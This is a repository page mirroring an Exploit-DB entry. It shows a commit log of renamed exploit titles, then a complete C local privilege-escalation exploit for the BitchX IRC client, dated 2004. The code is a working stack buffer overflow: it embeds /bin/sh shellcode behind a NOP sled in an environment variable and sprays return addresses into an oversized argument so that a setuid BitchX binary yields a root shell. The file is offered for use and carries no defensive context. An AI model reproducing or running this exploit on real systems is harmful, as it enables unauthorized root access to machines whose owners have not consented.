bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/local/586.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

71 lines
1.6 KiB
C
Executable file
Raw Blame History

// BitchX local-root by Sha0 (version 1.0c19 e inferiores -todas-)
// este exploit se lo dedico a mi chica.
// 0xC0000000-4-strlen(argv[1])-1-strlen(buffer)
// 2052 to the ret
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
char payload[69];
char sha0code[] =
"\xeb\x16\x5b\x31\xc0"
"\x50\x53\xb0\x0b\x89"
"\xdb\x89\xe1\x31\xd2"
"\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80\xe8"
"\xe5\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68";
void nopea (void);
int main (int argc, char **argv) {
char *buff;
char *arg1="bash";
char *arg2="-c";
char *arg[]={arg1,arg2,buff,NULL};
char *env[]={"TERM=xterm",payload,NULL};
char offset[]="";
char sret[4];
unsigned long lret;
int i;
if (argc != 2) {
fprintf (stdout,"BitchX exploit Coded By Sha0\n");
fprintf (stdout,"ej: %s /usr/bin/BitchX\n\n",argv[0]);
return (1);
}
buff = (char *)malloc (2100);
bzero (buff,sizeof(buff));
arg[2] = buff;
nopea ();
lret = 0xbffffffa - strlen(payload) - strlen(argv[1]);
sret[0] = (0x000000ff & lret);
sret[1] = (0x0000ff00 & lret) >> 8;
sret[2] = (0x00ff0000 & lret) >> 16;
sret[3] = (0xff000000 & lret) >> 24;
for (i=0;i<2088;i+=4) // 2088 tirando largo.
memcpy (buff+i,sret,4);
execve (argv[1],arg,env);
perror ("execve()");
free (buff);
return (0);
}
void nopea (void) {
bzero (payload,sizeof(payload));
memset (payload,0x90,sizeof(payload)-1);
memcpy (payload+sizeof(payload)-strlen(sha0code)-1,sha0code,strlen(sha0code));
}
// milw0rm.com [2004-10-20]
Reference in a new issue View git blame Copy permalink